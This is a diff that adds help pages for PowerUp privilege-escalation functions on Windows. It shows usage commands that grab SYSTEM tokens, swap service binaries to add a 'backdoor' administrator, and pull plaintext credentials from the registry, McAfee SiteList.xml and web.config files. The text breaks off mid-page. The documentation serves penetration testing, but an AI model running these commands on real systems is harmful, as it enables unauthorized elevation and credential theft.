b/docs/Privesc/Get-ModifiableRegistryAutoRun.md new file mode 100755 index 0000000..23314f9 --- /dev/null +++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md @@ -0,0 +1,44 @@ +# Get-ModifiableRegistryAutoRun + +## SYNOPSIS +Returns any elevated system autoruns in which the current user can +modify part of the path string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableRegistryAutoRun +``` + +## DESCRIPTION +Enumerates a number of autorun specifications in HKLM and filters any +autoruns through Get-ModifiablePath, returning any file/config locations +in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableRegistryAutoRun +``` + +Return vulneable autorun binaries (or associated configs). + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableRegistryAutoRun + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md new file mode 100755 index 0000000..4e48cc4 --- /dev/null +++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableScheduledTaskFile + +## SYNOPSIS +Returns scheduled tasks where the current user can modify any file +in the associated task action string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableScheduledTaskFile +``` + +## DESCRIPTION +Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" +and parses the XML specification for each task, extracting the command triggers. +Each trigger string is filtered through Get-ModifiablePath, returning any file/config +locations in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableScheduledTaskFile +``` + +Return scheduled tasks with modifiable command strings. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableScheduledTaskFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md new file mode 100755 index 0000000..92eeb81 --- /dev/null +++ b/docs/Privesc/Get-ModifiableService.md @@ -0,0 +1,40 @@ +# Get-ModifiableService + +## SYNOPSIS +Enumerates all services and returns services for which the current user can modify the binPath. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail + +## SYNTAX + +``` +Get-ModifiableService +``` + +## DESCRIPTION +Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if +the current user has rights to change the service configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md new file mode 100755 index 0000000..ab01e42 --- /dev/null +++ b/docs/Privesc/Get-ModifiableServiceFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableServiceFile + +## SYNOPSIS +Enumerates all services and returns vulnerable service files. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableServiceFile +``` + +## DESCRIPTION +Enumerates all services by querying the WMI win32_service class. +For each service, +it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine +if the current user has rights to modify the service binary itself or any associated +arguments. +If the associated binary (or any configuration files) can be overwritten, +privileges may be able to be escalated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableServiceFile +``` + +Get a set of potentially exploitable service binares/config files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md new file mode 100755 index 0000000..e52533c --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenGroup.md @@ -0,0 +1,114 @@ +# Get-ProcessTokenGroup + +## SYNOPSIS +Returns all SIDs that the current token context is a part of, whether they are disabled or not. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenGroup [[-Id] ] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current token groups for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 1372 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 1372 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-16-8192 1372 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 2640 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 2640 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-16-8192 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md new file mode 100755 index 0000000..9f835f2 --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenPrivilege.md @@ -0,0 +1,131 @@ +# Get-ProcessTokenPrivilege + +## SYNOPSIS +Returns all privileges for the current (or specified) process ID. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenPrivilege [[-Id] ] [-Special] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current privileges for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 2600 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2600 + SeUndockPrivilege DISABLED 2600 +SeIncreaseWorkingSetPrivilege DISABLED 2600 + SeTimeZonePrivilege DISABLED 2600 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege -Special +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeSecurityPrivilege DISABLED 2444 +SeTakeOwnershipPrivilege DISABLED 2444 +SeBackupPrivilege DISABLED 2444 +SeRestorePrivilege DISABLED 2444 +SeSystemEnvironmentPriv... +DISABLED 2444 +SeImpersonatePrivilege ...T, SE_PRIVILEGE_ENABLED 2444 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenPrivilege | fl +``` + +Privilege : SeShutdownPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeChangeNotifyPrivilege +Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +ProcessId : 2640 + +Privilege : SeUndockPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeIncreaseWorkingSetPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeTimeZonePrivilege +Attributes : DISABLED +ProcessId : 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Special +Switch. +Only return 'special' privileges, meaning admin-level privileges. +These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, +SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Privileged + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md new file mode 100755 index 0000000..ff48afc --- /dev/null +++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md @@ -0,0 +1,45 @@ +# Get-RegistryAlwaysInstallElevated + +## SYNOPSIS +Checks if any of the AlwaysInstallElevated registry keys are set. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAlwaysInstallElevated +``` + +## DESCRIPTION +Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated +or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys +are set, $False otherwise. +If one of these keys are set, then all .MSI files run with +elevated permissions, regardless of current user permissions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAlwaysInstallElevated +``` + +Returns $True if any of the AlwaysInstallElevated registry keys are set. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if RegistryAlwaysInstallElevated is set, $False otherwise. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md new file mode 100755 index 0000000..b93e75c --- /dev/null +++ b/docs/Privesc/Get-RegistryAutoLogon.md @@ -0,0 +1,44 @@ +# Get-RegistryAutoLogon + +## SYNOPSIS +Finds any autologon credentials left in the registry. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAutoLogon +``` + +## DESCRIPTION +Checks if any autologon accounts/credentials are set in a number of registry locations. +If they are, the credentials are extracted and returned as a custom PSObject. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAutoLogon +``` + +Finds any autologon credentials left in the registry. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.RegistryAutoLogon + +Custom PSObject containing autologin credentials found in the registry. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) + diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md new file mode 100755 index 0000000..ac758b0 --- /dev/null +++ b/docs/Privesc/Get-ServiceDetail.md @@ -0,0 +1,65 @@ +# Get-ServiceDetail + +## SYNOPSIS +Returns detailed information about a specified service by querying the +WMI win32_service class for the specified service name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ServiceDetail [-Name] +``` + +## DESCRIPTION +Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on +the pipeline object returned by Get-Service, extracts out the service name, queries the +WMI win32_service class for the specified service for details like binPath, and outputs +everything. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ServiceDetail -Name VulnSVC +``` + +Gets detailed information about the 'VulnSVC' service. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Get-ServiceDetail +``` + +Gets detailed information about the 'VulnSVC' service. + +## PARAMETERS + +### -Name +An array of one or more service names to query information for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.ManagementObject + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md new file mode 100755 index 0000000..1ebbb5b --- /dev/null +++ b/docs/Privesc/Get-SiteListPassword.md @@ -0,0 +1,96 @@ +# Get-SiteListPassword + +## SYNOPSIS +Retrieves the plaintext passwords for found McAfee's SiteList.xml files. +Based on Jerome Nokin (@funoverip)'s Python solution (in links). + +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-SiteListPassword [[-Path] ] +``` + +## DESCRIPTION +Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, +C:\Documents and Settings\, or C:\Users\. +For any files found, the appropriate +credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword +function that takes advantage of McAfee's static key encryption. +Any decrypted credentials +are output in custom objects. +See links for more information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SiteListPassword +``` + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : +Path : Products/CommonUpdater +Name : McAfeeHttp +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : +Server : update.nai.com:80 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Paris +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : paris001 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Tokyo +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : tokyo000 + +## PARAMETERS + +### -Path +Optional path to a SiteList.xml file or folder. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.SiteListPassword + +## NOTES + +## RELATED LINKS + +[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf) + diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md new file mode 100755 index 0000000..bcaf3d6 --- /dev/null +++ b/docs/Privesc/Get-System.md @@ -0,0 +1,172 @@ +# Get-System + +## SYNOPSIS +GetSystem functionality inspired by Meterpreter's getsystem. +'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create +a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. +NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure +token duplication works correctly. + +PowerSploit Function: Get-System +Author: @harmj0y, @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### NamedPipe (Default) +``` +Get-System [-Technique ] [-ServiceName ] [-PipeName ] +``` + +### Token +``` +Get-System [-Technique ] +``` + +### RevToSelf +``` +Get-System [-RevToSelf] +``` + +### WhoAmI +``` +Get-System [-WhoAmI] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-System +``` + +Uses named impersonate to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' +``` + +Uses named impersonate to elevate the current thread token to SYSTEM +with a custom service and pipe name. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-System -Technique Token +``` + +Uses token duplication to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-System -WhoAmI +``` + +Displays the credentials for the current thread. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-System -RevToSelf +``` + +Reverts the current thread privileges. + +## PARAMETERS + +### -Technique +The technique to use, 'NamedPipe' or 'Token'. + +```yaml +Type: String +Parameter Sets: NamedPipe, Token +Aliases: + +Required: False +Position: Named +Default value: NamedPipe +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServiceName +The name of the service used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PipeName +The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RevToSelf +Reverts the current thread privileges. + +```yaml +Type: SwitchParameter +Parameter Sets: RevToSelf +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhoAmI +Switch. +Display the credentials for the current PowerShell thread. + +```yaml +Type: SwitchParameter +Parameter Sets: WhoAmI +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/) + diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md new file mode 100755 index 0000000..8927520 --- /dev/null +++ b/docs/Privesc/Get-UnattendedInstallFile.md @@ -0,0 +1,44 @@ +# Get-UnattendedInstallFile + +## SYNOPSIS +Checks several locations for remaining unattended installation files, +which may have deployment credentials. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-UnattendedInstallFile +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnattendedInstallFile +``` + +Finds any remaining unattended installation files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnattendedInstallFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + +[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) + diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md new file mode 100755 index 0000000..4b61355 --- /dev/null +++ b/docs/Privesc/Get-UnquotedService.md @@ -0,0 +1,45 @@ +# Get-UnquotedService + +## SYNOPSIS +Get-UnquotedService Returns the name and binary path for services with unquoted paths +that also have a space in the name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission + +## SYNTAX + +``` +Get-UnquotedService +``` + +## DESCRIPTION +Uses Get-WmiObject to query all win32_service objects and extract out +the binary pathname for each. +Then checks if any binary paths have a space +and aren't quoted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnquotedService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnquotedService + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) + diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md new file mode 100755 index 0000000..78cef7d --- /dev/null +++ b/docs/Privesc/Get-WebConfig.md @@ -0,0 +1,93 @@ +# Get-WebConfig + +## SYNOPSIS +This script will recover cleartext and encrypted connection strings from all web.config +files on the system. +Also, it will decrypt them if needed. + +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WebConfig +``` + +## DESCRIPTION +This script will identify all of the web.config files on the system and recover the +connection strings used to support authentication to backend databases. +If needed, the +script will also decrypt the connection strings on the fly. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-WebConfig + +user : s1admin +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\test2 +path : C:\test2\web.config +encr : No + +user : s1user +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\inetpub\wwwroot +path : C:\inetpub\wwwroot\web.config +encr : Yes + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of clear text and decrypted connect strings from web.config files. +``` + +Get-WebConfig | Format-Table -Autosize + +user pass dbserv vdir path encr +---- ---- ------ ---- ---- ---- +s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No +s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes +s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +System.Data.DataTable + +## NOTES +Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. +for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings + +Author: Scott Sutherland - 2014, NetSPI +Author: Antti Rantasaari - 2014, NetSPI + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md new file mode 100755 index 0000000..bc75a2a --- /dev/null +++ b/docs/Privesc/Install-ServiceBinary.md @@ -0,0 +1,175 @@ +# Install-ServiceBinary + +## SYNOPSIS +Replaces the service binary for the specified service with one that executes +a specified command as SYSTEM. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary + +## SYNTAX + +``` +Install-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] +``` + +## DESCRIPTION +Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the +current user can modify the associated service binary listed in the binPath. +Backs up +the original service binary to "OriginalService.exe.bak" in service binary location, +and then uses Write-ServiceBinary to create a C# service binary that either adds +a local administrator user or executes a custom command. +The new service binary is +replaced in the original service binary path, and a custom object is returned that +captures the original and new service binary configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Install-ServiceBinary +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: 